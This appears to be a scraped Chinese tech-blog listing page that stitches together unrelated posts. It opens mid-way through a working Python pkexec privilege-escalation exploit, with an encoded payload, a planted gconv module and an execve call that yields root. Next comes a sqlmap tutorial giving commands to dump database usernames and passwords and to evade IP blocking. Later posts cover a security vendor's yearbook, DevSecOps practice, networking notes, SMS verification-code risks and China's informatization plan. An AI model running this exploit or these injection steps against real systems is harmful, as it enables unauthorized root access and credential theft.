QEBAQOAuAeYzYv4i5hoOAFdgILyUVYIZgeTR+7EY8iFrwMZcw4UYD+WLuPLfp6wc40lIQsTcwhZIPsT3tQgkO2LO4GlgzE+NALs5kY0OYW4jXg++p2Ku4gLsT5nfHwv6+/ktMOYyYntTltP/MMRbYON9nAT7GlzPDbC9OZT/JzCPnUcMnm8jcAtwO3AeuD/s12F+KwLzWhHlnL2tuXlDdHlbRyFrFqLr5TVybFXdIwXbrDu4OibH1q5w3ITIRrdh6ma8g8jZnKnJyWxBzuu5vKabfR5XRyGVTqxKJYhtdceNbiIn+rJGX8ZhU3dKejTdSOWyPkOlZbqWjrNAOMunTSLbScfsVE7m4MTQOolsar3U7KLFNDqXiJtxImvdapcez2hqd0Kftpw61Liux/scBZ7TpuKZFK2MVu205tTTYRhE7sxlMlrWvMOHeRuweeHN7S22P8B9bpy9mNMX25eA4PeEsO0j1+hYRz3Ob+TlnI5vfyNcA+px/iOvgwnG5pHk0eO8bCbOWoB6XE+Qcf1ASJz9BHHmMupx/iLjuob9D3C8hzhrg7u9JOjnKJm5/4gk1I16XI+QcT3i7x9e/wtQ1oTlZX7G9ZDFLJhB/yLx7Zm4Zb8OrvMI/vn3cPpo2M95Lp7fFvQSpx8I+5lbhm7Rv8rpT4X93D6L/k1Oj/ujkCPcgOH78zanx+9L5Eounr9/74Hezc2P+pmff/z4PcPpi+3zKdb+x5x+T9TPZ7l4fvyyzKIqMv197O77kWeOD3H8JT2qPXr8/0PkDvXfEP8eCXcfF+iHPOuHV4fP8Qhxrh/1uB9jrBbqmaX9MU7vbqyLOaTMop/g9Pg92xLzVeOCH39XoC7U94O+P+ZvB8GPn9/Ax7eD+pVF9F4uIbfiQ9D/NUv7fwNC41U+""" ))libc = CDLL(find_library("c"))libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)libc.execve.restype = c_ssize_twd = tempfile.mkdtemp()open(wd + "/pwn.so", "wb").write(payload)os.mkdir(wd + "/gconv/")open(wd + "/gconv/gconv-modules", "w").write( "module UTF-8// INTERNAL ../pwn 2")os.mkdir(wd + "/GCONV_PATH=.")os.mknod(wd + "/GCONV_PATH=./gconv")os.chmod(wd + "/GCONV_PATH=.", 0o777)os.chmod(wd + "/GCONV_PATH=./gconv", 0o777)os.chmod(wd + "/pwn.so", 0o777)os.chdir(wd)cmd = b"/usr/bin/pkexec"argv = []envp = [ b"gconv", b"PATH=GCONV_PATH=.", b"LC_MESSAGES=en_US.UTF-8", b"XAUTHORITY=../gconv", b"",]cargv = (c_char_p * (len(argv) + 1))(*argv, None)cenv = (c_char_p * (len(envp) + 1))(*envp, None)libc.execve(cmd, cargv, cenv)成果 ...

February 5, 2022 · 1 min · jiezi

关于安全:sqlmap基本使用

Mysql数据库1、先检测是否能够注入,先判断是否能够失常注入: sqlmap -u url -v 3 外面有个留神的点url前面必须是可注入的参数?id=之类的,否则url检测会有问题 对于某些明天url能够在/a/b.html尝试退出号来进行此门路内的检测 2、爆库 sqlmap.py -u http://sqli-labs-master/Less-... -v 3 --dbs --batch 3、依据爆进去的库查表 sqlmap.py -u http://sqli-labs-master/Less-... -v 3 -D "security" --tables --batch 4、依据表查字段 sqlmap.py -u http://sqli-labs-master/Less-... -v 3 -D "security" -T "users" --columns --batch 5、依据字段查值 sqlmap.py -u http://sqli-labs-master/Less-... -v 3 -D "security" -T "users" -C "username,password" --dump --batch 避免被IP拦挡的操作,random-agent让申请头随机: 能够在前面减少--proxy http://127.0.0.1:8080 --random-agent -v 3 Access对于Access数据库,间接报表就OK sqlmap -u "http://192.168.96.16/shownews.asp?id=23" --tables sqlmap外面的字典地位,内置字典地位为,能够依据本人的须要更改,对于Access个别就是间接暴库 sqlmap\data\txt

January 27, 2022 · 1 min · jiezi

关于安全:火绒安全2021终端安全情报年鉴发布-勒索病毒布局各行各业

2021年是寰球严防“疫情”大背景下,网络安全迈入新常态的一年:以勒索病毒、木马病毒、挖矿病毒、蠕虫病毒等为主的恶意程序一直对全网用户发动攻打,而黑客团伙还在不断更新病毒和攻打渠道,一边与平安厂商反抗,一边夺取利益。对此,“十四五”布局中将增强网络安全作为重要一步,同时,《个人信息保护法》、《数据安全法》等法规相继出台,也明确了用户的数据安全底线。 火绒平安依据对2021年全网威逼的钻研剖析和服务用户时处理的安全事件,联合“火绒威逼情报系统”、“火绒在线反对和响应核心”等平台产生的实在数据,重磅公布《火绒平安2021终端平安情报年鉴》(以下简称“年鉴”),别离从终端“威逼与攻打趋势”、“火绒平安响应服务”、“火绒防护体系”三个方面论述2021终端平安面临的威逼,以及相应的解决方案。 **回升 全网终端遭逢攻打24亿次** 依据“火绒威逼情报系统”监测和评估,2021年火绒平安拦挡终端遭逢的攻打高达24亿次。从攻打的趋势来看,2021年整体呈上升趋势,仅在2月份与10月份稍有降落。攻打终端的次要恶意程序包含木马病毒、流氓软件、感化型病毒、蠕虫病毒等。 *新增截获病毒新增样本超千万* 新增样本的数量与增长趋势显示黑客攻击的强烈水平,可能更实在的反映全网的平安情况。2021年火绒平安共截获病毒新增样本数量超过千万,其中,木马病毒(Trojan)、黑客工具(HackTool)和蠕虫病毒(Worm)的新增样本量均超过百万,别离占据总数的31%、21%和18%。 *增长钓鱼PDF成倍增长至数百万* 2015年后,歹意PDF样本大量呈现,之后每年以数倍的速度增多,其中99%用于钓鱼攻打。至2021年,共检测到数百万钓鱼PDF样本。这些钓鱼攻打频繁应用PDF格局的起因,一方面是PDF有丰盛的展示模式极具迷惑性,较邮件、短信等纯文字而言,更难以被检测;另一方面,PDF文件日常应用宽泛,当邮件中的钓鱼PDF在浏览器中显示时,用户容易误认为是网站提醒而点击。 *暴发病毒攻打年末进入高峰期* 2021年火绒平安团队累积为企业用户提供应急响应2637次。从企业用户遭逢的病毒类攻打来看,次要以挖矿病毒、勒索病毒、蠕虫病毒等类型为主,别离占据攻打总数的28%、25%和12%,且该三大类型病毒攻打频次均在10月份后出现疾速回升趋势,并在年末达到顶点。 **威逼勒索病毒“布局”各行各业** 2021年中勒索病毒在各行业均有较高的比重,受影响行业前三别离为金融行业、计算机与电子行业、教育行业。除勒索病毒外,金融行业中木马病毒占比最高;医疗行业、制造业中蠕虫病毒占比最高。教育行业遭逢的病毒类型中,勒索病毒、挖矿病毒、感化型病毒占比均较高。 **侵扰拦挡弹窗广告45亿次** 2021年中,火绒平安共拦挡(不含用户手动拦挡)45亿次拦挡弹窗。近几年,随着《互联网广告暂行办法》等相干规定与每年两会期间对弹窗问题的关注,以及央视等支流媒体的继续披露报道,尽管在以往弹窗行为最疯狂的“618”、“双11”等电商购物节期间,没有呈现短时间内暴发的状态,但从全年拦挡状况查看,弹窗广告仍旧是次要侵扰用户的流氓行为之一。 除此之外,年鉴还剖析了2021年中典型的攻打渠道和攻打趋势,可作为用户构建终端平安防线的重要参考,包含: 1、企业受到Web服务破绽攻打次数回升2、“定制化”的钓鱼邮件如何精准针对企业3、挖矿病毒利用破绽攻打Linux零碎4、横向浸透攻打下半年愈演愈烈,成为病毒入侵的标配…… 最初,火绒平安还在年鉴中附上火绒平安产品对应的威逼解决形式,包含对挖矿病毒的彻底清除、对勒索病毒的多重防护、对破绽攻打的拦挡、对横向浸透攻打的阻断等,以及部署火绒平安产品后的重点巡检我的项目内容,可帮忙用户进一步坚固平安防线。 点击链接收费获取完整版年鉴报告 申明:本文为火绒平安原创,版权归火绒平安所有。如需转载请留言分割咱们。

January 24, 2022 · 1 min · jiezi

关于安全:25万字一文读懂企业DevSecOps全实践-IDCF

本文译自Securosis网站Adrian Lane的系列博客文章,内容包含: 根本准则平安人员如何与开发协同工作平安测试集成构建平安工具链平安打算平安人员在 DevOps 中的作用一、根本准则1.1 导语DevOps 是一个操作框架,通过自动化来促成软件的一致性和标准化。通过突破不同开发团队之间的阻碍,同时通过优先思考使软件开发更快更容易的事件,该框架帮忙解决了围绕集成、测试、打包和部署的许多噩梦般的开发问题。 DevSecOps是将平安团队和平安工具间接集成到软件开发生命周期中,利用 DevOps 的自动化和效率,确保每个构建周期都进行应用程序平安测试。这促成了安全性、一致性,并确保安全性与其余质量指标或个性同样重要。自动化的安全性测试,就像自动化的应用程序构建和部署一样,必须与基础设施的其余部分一起组装。 但这就是问题所在。软件开发人员传统上并不反对安全性。这并不是因为他们不关怀平安问题,而是因为他们被激励去关注新个性和性能的交付。DevOps 正在扭转自动化构建过程的优先级,使它们更快、更简略并且更统一。 然而,这并不意味着他们会特意退出平安或平安工具。这是因为平安工具不容易与开发工具和流程很好地集成,咱们常常会发现大量队列沉积,并且以开发为核心的过滤器难以帮忙优先平安工作。更蹩脚的是,平安平台——以及举荐它们的平安业余人员——很难应用,甚至无奈提供 API 反对来提供集成。 另一方面在于平安团队,他们胆怯自动化的软件过程,常常会问“咱们如何管制开发”这样的问题。这一问题的实质既疏忽了 DevSecOps 的精力,也疏忽了开发组织为使每个软件版本更快、更高效和更统一所做的致力。对于平安团队来说,应答软件开发中产生的变动,并扩大他们绝对较小的组织的惟一办法,就是变得和开发团队一样麻利,并且拥抱自动化。 1.2 为什么我要写这篇文章?咱们通常探讨咱们做钻研背地的动机,以帮忙读者了解咱们的指标和心愿传播的内容。当咱们更新一份钻研报告时,状况就更加简单了,因为它有助于咱们聚焦最近行业的变动,这些变动导致旧的论文在形容最近的趋势方面存在不精确或有余的问题。因为 DevOps 和 DevSecOps 选项在近四年曾经相当成熟,所以,对于这一方面咱们有很多要谈的。 这项工作将是对咱们2015年对于将平安构建到 DevOps 中的钻研工作的重大改写,包含围绕平安团队询问的对于 DevSecOps 的常见问题的重大增补,以及对集成工具和办法的彻底更新。 这篇钻研论文的大部分内容将反映的是2017年以来财产2000强公司的200多个平安团队的400屡次谈话。因而,咱们将包含泛滥从这些对话中衍生进去的探讨要点。因为 DevOps 曾经存在了很多年,咱们将不过多探讨什么是 DevSecOps 或者它是如何对咱们无益的,更多的是对于如何组合一个 DevSecOps 程序的求实的内容。 当初,让咱们开始扭转! 1.3 不同的焦点,不同的价值有大量新的考察和钻研论文可用,其中一些是十分好的。还有更多的会议和在线资源涌现进去,资源多到我都数不过去了。例如,Veracode 最近公布了他们的软件平安状态(SoSS)报告的最新版本,这份报告是一个大部头读物,带有大量的数据和察看。要害的要点是 DevSecOps 团队应用的灵活性和自动化提供了显著的平安劣势,包含更快的修补周期,更短的缺点持续时间,更快的技术债权缩小,以及更容易的扫描意味着更快的问题辨认。 最近公布的2019年软件供应链状态报告显示,团队示意,典范我的项目团队利用 DevOps 准则大大降低了代码部署失败率,补救破绽的工夫只有平均水平的一半。 咱们还有像DevOps全天的流动,数以百计的 DevOps 从业者在这里分享对于文化转型、继续集成 / 继续部署(CI/CD)技术、SRE以及 DevSecOps 的故事。 所有这些都很棒,并且提供了一系列定性和定量的数据来阐明为什么 DevOps 可行,以及从业人员是如何演变他们的程序的。 这不是这篇文章的主题。这些资源并没有解决我每周都被问到的问题。 留神,本文是对于如何整合一个全面的 DevSecOps 我的项目。因为咱们总是被问到“我如何把一个 DevSecOps 我的项目组合在一起? ” 以及“安全性与 DevOps 有什么关系? ” 。他们不是在寻找正当理由,也不是在寻找对于细微差别的故事来解决具体的阻碍。他们须要一个与同行组织保持一致的平安程序,并拥戴“平安最佳实际”。这些受众绝大多数是平安和 IT 从业者,很大水平上被开发团队所忘记,他们至多承受了麻利概念,如果不是齐全承受 DevOps 的话。面临的挑战是了解开发试图实现什么,以某种形式与这些团队集成,并弄清楚如何利用自动化平安测试,使其至多像开发团队一样麻利。 ...

January 21, 2022 · 4 min · jiezi

关于安全:计算机网络重点回顾

计算机网络 一.计算机网络概述 计算机网络的概念:(*) 1.**计算机网络的定义**: 2.**计算机网络的组成:** 3.计算机网络的类型: 计算机网络体系结构 1.传输方式: 2.数据交换: 3.通信协议和体系结构: 二.物理层 1.物理层的基本概念: 1.1四大个性:(***) 1.2两种信号: 1.3调制和编码: 1.4传输介质: 1.5三大部分: 2.物理层的根本通信技术 2.1四种信道复用技术 2.1.1复用技术 2.1.2频分复用FDM 2.1.3时分复用TDM 2.1.4波分复用WDM(波) 2.1.5码分复用 2.数据传输方式 2.1通过同工夫传输数量分为 2.2通过数据报文的单方的行为分为 3.3通过传输的信号分 3.4通过传输方向分 3.5通过传输对象分 三.数据链路层 1.数据链路层的根底概念 1.1数据链路层的概念 1.2帧的概念 1.3以太网数据帧中的MAC和LLC 1.4数据链路层的两种传输方式 1.5数据链路层的三个根本问题(***) 1.6局域网中的设施 2数据链路层的通信协议 2.1抵触域和播送域(*) 2.2虚构局域网(试验)VLAN(***) 2.3:CSMA/CD(总线型)(***) 2.4:PPP(单播) 2.5:CRC(须要独自的深刻学习) 四.网络层 1.网络层的作用 2.网际层协定IP 3.IP地址 3.1IP地址的概念 3.2IP地址的组成 3.3IP地址的分类 3.3.1A类 3.3.2B类 3.3.3C类 3.3.4D类 3.3.5E类 3.3.6非凡地址 4.IPv6 4.网络层的路由 4.1路由 4.2路由的配置形式 五.传输层 1.传输层概念 1.1传输层 1.2端口号 2.传输层的两个重要协定 3.1TCP 3.2UDP 六.应用层 1.应用层的作用 2.应用层中常见的协定 七.网络安全 1.网络安全概论 1.1网络安全 1.2计算机网络面临的威逼次要分为两类 1.2.1主动攻击 1.2.2被动攻打 1.2网络系统个性 2.加密和交互 2.1加密和解密 2.1.1加密 2.1.2解密 2.2公钥和私钥 2.2.1对称加密 2.2.2非对称加密 2.3防火墙 防火墙的区域们计算机网络一.计算机网络概述计算机网络的概念:(*)1.计算机网络的定义: ...

January 18, 2022 · 2 min · jiezi

关于安全:技术人员需要了解的手机验证码登录风险

手机验证码登录是一种常见的利用登录形式,简略不便,不必记忆明码,市面上能见到的APP根本都反对这种登录形式,很多利用还把登录和注册集成到了一起,注册+登录零打碎敲,给用户省去了很多麻烦,颇有一机在手、天下我有的感觉。 登录原理手机验证码登录的原理很简略,对于一个失常的登录流程,看下边这张图就够了: 理论利用中会存在一些收不到验证码的状况,可能的起因如下: 在手机端,短信被某些软件认为是垃圾信息而被拦挡或者删除,或者因为手机卡欠费导致收不到短信。在利用服务端,因为程序谬误,或者平安控制策略导致局部短信发送失败。在短信平台或者电信运营商零碎,因为黑名单、关键字、流量管制,或者其它某些技术起因导致发送失败。针对收不到短信的问题,零碎中会减少重发验证码性能,如果多次重发还收不到,零碎能够反对上行短信或者语音验证码的形式,这两种形式都是短信验证码的变种。 上行短信是让用户将零碎提前生成好的若干字符发送到零碎指定的短信号码,据此能够验证用户领有指定手机的控制权,从而也就认证了用户的身份。 语音验证码能够让用户发动,也能够在零碎收到短信发送未胜利的回执时被动推送,用户手机会收到一个主动语音通话,其中蕴含登录所需的验证码。平安危险和应答策略手机验证码的平安危险次要是被歹意利用和窃取。 因为手机验证码的利用非常宽泛,为了有一个更全面的意识,这里说的平安危险没有局限在登录这一点上,所有应用手机验证码的场景都可能存在。这里的应答策略次要是站在零碎开发者的角度,通过各种技术计划来解决或者升高手机验证码的平安危险。 短信欺骗诈骗者先获取到用户手机号,而后假冒金融机构、公权力部门、亲朋好友,在利用中输出用户手机号申请验证码后,向用户索要对应的手机验证码,用户稍不留神可能就会造成金钱损失。 针对此类问题,零碎开发者能够思考如下一些计划: 在验证码中申明:工作人员不会索取,打死也不要透露给他人。不过人在一些非凡状况下是不会理睬这些正告的。跟踪用户的罕用登录特色,比方获取验证码时的设施、IP、WIFI、地区不是罕用的,零碎就能够马上短信或者语音告诉用户可能存在平安危险,请审慎操作;零碎还能够间接降级安全级别要求更多的验证形式,比方须要再次获取验证码、输出平安码、刷取指纹、辨认人脸、插入U盾等等验证形式。还有一种绝对荫蔽的欺骗形式,诈骗者间接向用户发送仿冒钓鱼网站的地址,用户在钓鱼网站获取验证码时,诈骗者拿着用户手机号去实在网站申请验证码,此时用户会收到一个实在的验证码,用户在钓鱼网站输出验证码后,诈骗者就能够拿着这个验证码去实在网站应用。 针对这种状况,前边的辨认用户罕用登录特色的形式依然无效。此外短信平台和电信运营商也有责任对短信内容进行把关,短信平台须要验证发送者的实在身份、审核短信内容,并提供动静的流量管制机制,这样能够过滤掉绝大部分欺骗短信。 其实电信运营商是可能辨认手机地位的,如果电信运营商可能提供一种平安的地位认证服务,也能够解决大部分验证码欺骗问题,比方前端提交验证码认证时携带电信运营商提供的地位标识,利用服务商能够拿着这个地位标识去找电信运营商验证地位,当然这只是一个构想,事实中还没有这种办法。 短信攻打可能有两种场景下的短信攻打: 用户在前端不停的点击获取验证码,可能是放心收不到验证码,也可能是失去了期待的急躁,也可能是歹意向别的手机号发送。攻击者间接调用发送验证码的接口,在极其的工夫发送大量验证码申请,可能是发给某个用户也可能是一批用户。此类操作首先会节约短信资源,给利用服务商造成损失;歹意攻打还会向无辜的用户发送大量短信,造成骚扰攻打。 应答这种问题,能够思考如下一些计划: 减少其它验证。 获取短信验证码之前必须先通过这些验证,比方图形验证码、滑动验证码、数学公式验证码等等。这些形式能够减少发送短信验证码的难度,升高人工的发送速度,尽量避免机器人主动操作。 对操作进行限流。 比方当初前端常见的发送短信验证码倒计时,个别每次申请验证码后通过若干秒能力再次发送。因为如果攻击者获取到了发送验证码的服务接口,就能够解脱前端逻辑的限度,所以后端也能够采纳同样的策略,对设施Id、手机号、IP、用户、业务类型等等,以及它们的各种组合,进行频率管制。利用开发者还能够依据发送后果特色来进行管制,比方空号率,如果空号太多则阐明可能是机器人随机生成的手机号。在繁多频率的限度根底之上,还能够减少更多的工夫管制,在分钟、小时、天等工夫维度上做不同的阈值限度。 给用户提供一个短信退订入口。 用户频繁收到非本人被动发动的验证码短信时,能够提供一个退订入口,让用户在短时间内敞开短信验证码,应用服务此时能够疏忽给用户发送验证码的申请,或者间接去掉发送验证码的性能入口。 然而这种管制要尽量以不影响用户的失常业务操作为前提,否则就得失相当了。 比方图形验证码的难度不要太高,毕竟大部分业务不是12306,你照搬过去可能就会画蛇添足。再比方对于限流管制,假如失常用户个别只在一天的某些时候进行操作,不会一天24小时都在做某一件事,则能够这样做:每个手机号每小时只能发送X次,每天只能发送Y次,这两个数值要合乎 X<Y & 24*X\>>Y。对于重大的攻打,应该设置熔断机制,此时不得不就义可用性。比方短时间涌入了大量针对不同手机号的验证码需要,很可能是受到了DDOS攻打,因为资源无限,此时失常用户的操作也会受到影响,能够依靠全局限流,触发限流时间接敞开验证码服务一段时间。网络窃听假如用户收到了登录验证码,输出正确后提交服务端验证。在从手机端到服务端的传输过程中,会通过很多的网络设备和服务器零碎,登录提交的内容有被拦挡获取的可能,此时攻击者就能够阻断申请,本人拿着用户的手机号和验证码去登录。 应答这种问题,个别须要对网络传输内容进行加密,比方当初罕用的https通信,能够保障两端之间的传输内容平安,不被窃听。对于传输平安,个别这样解决也就够了。 不过https也不是银弹,如果有攻击者在客户端偷偷导入了本人的证书,而后让网络申请都先通过本人进行代理,再发送到指标地址,则攻击者还是可能获取到申请内容,想体验这种形式的能够应用fiddler试试。还有https证书存在错发的可能,如果给攻击者发放了他人的证书,此时平安传输也就没什么意义了。 为了更高的安全性,传输内容能够在利用中加解密,客户端对要传输的数据依照与服务端的约定进行加密,而后再发送到网络,攻击者截获后,如果没有无效的解密伎俩,则能够保证数据不被窃听。加密的重点是保障密钥平安,不被窃取和替换,能够采纳其它平安信道传输,甚至线下传递的形式。对于验证码这种仅做验证的数据,还能够通过加盐后进行慢Hash运算,攻击者即便拿到了传输内容,要进行破解的难度也相当微小。 本地窃听如果零碎上装置了恶意软件或者非官方版本的软件,特地是在盗版零碎、被Root或者越狱的手机零碎中,攻击者也能比拟容易的拦挡并窃取短信验证码;同时网络窃听中的加解密也可能失去作用,因为软件曾经不可信,在不同的操作之间有么有产生什么猫腻,很难确定。 最近几年在挪动设施上引入了一个称为可信执行环境(简称TEE)的概念,独立于操作系统,独自的利用,独自运行,有的甚至有独自的处理器和存储,内部很难进入和破解。一些要害的操作都封装在这里边,比方指纹的采集、注册和认证,密钥的生成和应用,版权视频的解码和显示,等等。如果把短信验证码的解决也放在这里边,无疑会平安很多,不过这要解决很多通信方面的问题,收益与老本可能不成正比。在台式机中这一技术还所见不多,可能台式机的环境曾经有了比拟成熟的平安体系,不过从挪动端迁徙过去难度应该也不大。 短信嗅探短信嗅探也是一种窃听技术,不过是通过攻打电信网络通信的形式。 当初手机个别都应用4G、5G网络了,然而“短信嗅探”技术只针对2G网络,不法分子通过非凡设施压抑基站信号,或者选择网络品质不佳的中央,或者应用4G伪基站坑骗手机,这会导致网络降频,使手机的3G、4G通信升高到2G。 2G网络下,只有基站验证手机,手机不能验证基站,攻击者通过架设伪基站,让指标手机连贯上来,而后就能获取一些连贯鉴权信息,再假冒指标手机去连贯真基站,连上当前拨打攻击者的另一个手机,通过来电显示失去指标手机号码。 基站自身并不会用特定方向的信号与每部手机通信,而是向周围以播送的模式发送信号。所以每部手机实际上也是能够接管到其余手机的信号,2G网络传输数据时没有加密,短信内容是明文传输的,就能够嗅探到指标手机的短信。加之2G通信协定是开源的,所以这件事的技术门槛并不高。 因为这种攻打要求手机不能挪动,如果基站切换就没用了,所以攻打个别抉择夜深人静的时候。对于普通用户来说,睡觉的时候能够抉择关机或者开启航行模式;另外开明 VoLTE ,能够让电话和短信都是走 4G 通道,不过网络降级很难防备;或者买个能辨认伪基站的手机,不过没方法保障百分百可能辨认;或者就只能等着挪动运营商敞开2G网络了。 对于利用零碎开发者,应该意识到通信通道的不安全性。必要的时候开启双因子验证,除短信验证码外还能够应用短信上行验证、语音通话传输、专用明码验证、罕用设施绑定、生物特色辨认、动静抉择身份验证形式等等多种二次验证办法。 重放攻打假如某些交易服务须要通过短信验证码来验证用户的身份。如果有攻击者截获了交易申请报文,而后屡次发送到服务端,服务端仅查看了验证码是否正确,则可能理论产生屡次交易。此时攻击者都不须要解密传输内容。 此时应该限度验证码只可能应用一次,服务端收到交易申请时首先查看验证码,查看通过后将验证码置位或删除,而后再解决交易,不论交易是否胜利,验证码都不能再次应用。另外还应该在生成验证码时设置一个较短的有效期,如果用户没有理论提交,攻击者也必须在有效期内能力应用,减少攻打难度。 当然你也能够应用更通用的防重放伎俩,比方每次申请验证码都先从后端获取一个随机数,随机数如果曾经应用过则不能再次应用,随机数如果不存在也不能解决申请。当然随机数也能够在前端生成,服务端如果收到了反复的随机数则拒绝请求,然而须要避免传输过程中随机数不被篡改,能够通过密钥签名的形式。 以上就是本文次要内容,满腹经纶,如有错漏,欢送斧正。 播种更多架构常识,请关注公众号 萤火架构。原创内容,转载请注明出处。

January 17, 2022 · 1 min · jiezi

关于安全:中央网信委印发十四五国家信息化规划网络安全市场进入快速增长期

编者按 近日,地方网信委公布《“十四五”国家信息化布局》,对我国“十四五”(2021-2025)期间信息化倒退作出部署安顿,强调兼顾倒退和平安,保持平安和倒退并重,全面增强网络安全保障体系和能力建设,为网络安全行业倒退带来新契机。 本期产业平安TALK,将聚焦信息化和网络安全,通过解读《布局》中的亮点内容,说明网络安全对于信息化建设的重要性,同时剖析《布局》对数字产业、网络安全行业等不同主体的影响,以期为行业带来新思考。 (网信办官网公布《“十四五”国家信息化布局》) 作者:金珉锡 “十四五”期间,信息化进入放慢数字化倒退、建设数字中国的新阶段。网络安全作为数字化倒退的基石,被列入《“十四五”国家信息化布局》重要内容。 《“十四五”国家信息化布局》 有何重点? 《布局》零碎筹划了“十四五”期间数字中国建设的时间表、路线图、任务书。具体到网络安全畛域,有5大重点值得关注: 重点1:平安与倒退并重 在指导思想、根本准则、倒退指标及主攻方向中,《布局》强调要兼顾倒退和平安,保持平安和倒退并重,切实守住网络安全底线,以平安保倒退、以倒退促平安,推动网络安全与信息化倒退协调一致、齐头并进,兼顾晋升信息化倒退程度和网络安全保障能力,一直加强网络空间综合治理能力和平安保障能力。 同时要立足倒退新阶段,深入关口前移、防患于未然的平安理念,压实网络安全责任,增强网络安全信息兼顾机制建设,造成多方共建的网络安全防线。开发网络安全技术及相干产品,晋升网络安全自主防御能力。欠缺相干法律法规和技术标准,标准各类数据资源采集、治理和应用,防止重要敏感信息泄露,强化新技术利用平安危险动静评估。 重点2:构建平安防护体系和平安保障体系 构建适应5G倒退和垂直利用的平安防护体系,增强5G供应链平安治理;构建低成本、广覆盖、牢靠平安的公共算力服务;推动区块链、平安多方计算、联邦学习等技术模式在数据流通中的翻新利用;建设根底网络、数据中心、云、数据、利用等一体协同的平安保障体系;发展通信网络安全防护,钻研欠缺海量数据汇聚交融的危险辨认与防护技术、数据脱敏技术、数据安全合规性评估认证、数据加密爱护机制及相干技术检测伎俩。 重点3:增强数据治理、强化数据安全保障 强化国家数据治理协同,健全数据资源治理制度体系,进步数据品质和规范性。聚焦数据管理、共享凋谢、数据利用、受权许可、平安和隐衷爱护、危险管控等方面,摸索多主体协同治理机制。增强数据收集、汇聚、存储、流通、利用等全生命周期的平安治理,建立健全相干技术保障措施,增强对重要数据、企业商业秘密和个人信息的爱护,强化平台企业数据安全爱护责任。 重点4:培养先进平安的数字产业体系 强化要害信息技术翻新,兼顾通信技术、先进计算、平安技术等畛域的产业布局。面向云计算、大数据、信息安全等重点畛域和重大需要,增强重点软件的开发。疏导建设企业为主体、市场为导向、产学研用深度交融的协同翻新体系。聚焦要害信息基础设施平安、网络安全、数据安全等畛域,放慢欠缺法律法规和标准规范体系建设。反对网信企业发展壮大,打造具备国内竞争力的数字产业集群。培养壮大人工智能、大数据、网络安全等新兴数字产业,放慢新一代信息技术与实体经济交融利用,施行“上云用数赋智”口头。 重点5:全面增强网络安全保障体系和能力建设 增强网络安全核心技术联合攻关,发展高级威逼防护、态势感知、监测预警等关键技术钻研,建设平安可控的网络安全软硬件防护体系。施行国家根底网络安全保障能力晋升工程,增强要害信息基础设施平安防护体系建设,加强网络安全平台撑持能力,强化5G、工业互联网、大数据中心、车联网等平安保障。欠缺网络安全监测、通报预警、应急响应与处理机制,晋升网络安全态势感知、事件剖析以及疾速恢复能力。 网络安全贯通信息化倒退始终 以后网络安全局势日趋简单严厉。从寰球来看,网络攻防反抗的强度、频率、规模和影响水平一直降级;从国内来看,平安威逼危险仍然严厉,要害信息基础设施频遭攻打,恶意程序影响继续扩充;从行业来看,云产品成为网络攻击重灾区,5G时代面临新平安挑战,网络安防技术亟待交融翻新,各种平安危险交错叠加,对筑牢网络安全屏障提出了新挑战。 没有网络安全就没有国家平安,没有信息化就没有现代化。中国信息通信研究院高级工程师郭华明认为,中国的网络强国策略是“网络安全”与“信息化”两翼齐飞、双轮驱动的策略,建设网络强国,既要解决网络安全问题,也要放慢倒退信息化。同时,随着寰球信息化的迅猛发展,各种业务一直上云,使得整个国家和社会对网络的依赖水平越来越大,网络已成为社会和经济倒退的弱小推动力,网络安全的位置也越来越重要。 《布局》指出,以后新兴市场国家和发展中国家崛起速度之快前所未有,新一轮科技反动和产业革命带来的强烈竞争前所未有,信息反动继续深入带来新机遇、新空间。从海内外倒退局势来看,我国信息技术产业链、供应链、翻新链的安全性、稳定性受到严厉挑战,更为平安的倒退是新阶段主攻方向。 从现阶段我国信息化及网络安全建设成就来看,我国基础设施规模寰球当先,互联网普及率超过70%,信息技术产业寰球翻新指数已跃升至寰球第14位,数字经济总量跃居世界第二,“互联网+政务服务”利用广度和深度疾速拓展,信息化倒退环境继续优化。随着信息技术与网络安全标准化、学科建设、人才培养等获得踊跃停顿,我国网络安全保障能力正显著加强。 从网络安全相干法律法规、政策条例的欠缺来看,随着《网络安全法》、《电子商务法》、《网络安全审查方法》等法律法规的颁布实施,信息化、网络安全倒退法律政策框架根本造成。从各省市“十四五”布局网络安全相干政策条例,能够看出贯通信息化倒退始终的网络安全正迎来政策红利。 (局部省市“十四五”布局·网络安全相干政策) (数据起源:中国一带一路网《各省(区、市)“十四五”布局倡议文件一览》) 网络安全市场进入疾速增长期 据《2021年中国网络安全产业剖析报告》显示,2020年我国网络安全市场规模约为532亿元,到2023年市场规模预计将超过800亿元,网络安全行业正走向新的春天。此外,《布局》在“十四五”信息化倒退次要指标中指出,到2025年,IT我的项目投资占全社会固定资产投资总额的比重将回升至5.8%,这将为国内IT软硬件、信息服务、网络安全倒退注入新的动能。 同时,各项政策红利和《布局》中提及的重点工程、优先口头,将为数字产业、网络安全行业发明微小的需要空间。比方,造成多方共建的网络安全防线,开发网络安全技术及相干产品,晋升网络安全自主防御能力,建设根底网络、数据中心、云、数据、利用等一体协同的平安保障体系等措施,将无效晋升我国网络安全防护能力的同时,助力产业倒退,进而构建坚不可摧的网络环境。 聚焦到对网络安全行业的影响,新华三团体平安产品线总裁孙松儿认为,“威逼发现,监测预警,应急指挥,攻打溯源”这16个字明确了要害信息基础设施爱护的方针。东软团体网络安全事业部总经理杨纪文示意,要充分利用大数据、人工智能等新技术来进步网络安全能力,为国家的数字经济倒退保驾护航。 此外,《布局》在全民数字素养与技能晋升、企业数字能力晋升、前沿数字技术冲破、基层智慧治理能力晋升、绿色智慧生态文化建设、数字农村倒退、数字普惠金融服务等优先口头中,着重强调要激发数字翻新潜能、优化数字生存环境、晋升数字生活品质,分级分类推动数字能力试点示范,强化基础设施、利用终端、数据交融、安全监管等整体规划设计和集成。这一系列措施都将优化过来碎片化、单点进攻的思路,有助于系统化应答将来网络安全问题。 国务院发展研究中心研究员李广乾示意:“我国数字经济倒退速度始终高于我国GDP增速,数字经济是新期间我国信息化倒退策略的具体体现。”随着后疫情时代寰球产业链、供应链粗浅变动,推动数字化和数字中国建设,推动技术创新和数字产业落地势在必行。与此同时,与之相伴而生的网络安全行业也将扶摇而上。 信息化倒退过程中,网络安全始终是一个绕不开的话题。“十四五”期间作为乘势而上,向第二个百年奋斗目标进军的关键时期,政府、平安厂商及各主体应踊跃重构数字经济的新一代平安架构和平安基建的规范,进步各类社会主体在数字化过程中的危险免疫能力,从源头上升高网络安全威逼。

